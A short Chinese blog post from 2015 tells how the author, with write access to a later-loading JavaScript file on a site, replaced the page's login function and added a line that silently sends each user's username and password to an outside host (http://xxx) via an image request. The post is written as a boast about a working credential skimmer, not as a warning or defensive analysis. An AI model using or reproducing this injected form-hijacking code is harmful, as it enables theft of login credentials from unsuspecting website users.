js代码另类劫持登录表单
浏览数:24 /
时间:2015年06月09日
另类在哪呢?另类在页面自带一个外部js,劫持login这个function,而我恰能修改它下面的一个js(唯一一个,而且是废弃不用了的)。
那个js里面的代码用了jQuery,把之后再加载的网页自身的function login给替换为自己的function。
=========
我的权限:可修改那个外部js下面的一个js,命运啊,偏偏我能那么做。
--------------------------
我js很菜的,现在这情况,居然也能发挥一下了,我把我能控制的js内容完全copy了那个外部js,
由于我的js比那外部js后加载,于是我在里头修改后的函数才是真被调用的那一个。
记得吗?那个外部js劫持了网页的login这个function(暂且叫用自己的A函数替换了那个login函数,人家这么做有一些其他目的,倒方便我照抄了),这个function是用来检查表单用户名密码填了没有的.
太好了,现在我的js的A函数才是真正替代了login函数的,于是A函数里加一句(new Image()).src=‘http://xxx"+document.loginForm.yh+document.loginForm.mm;
oh,yeh,点击登录按钮后,用户名密码就悄悄发来了。
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
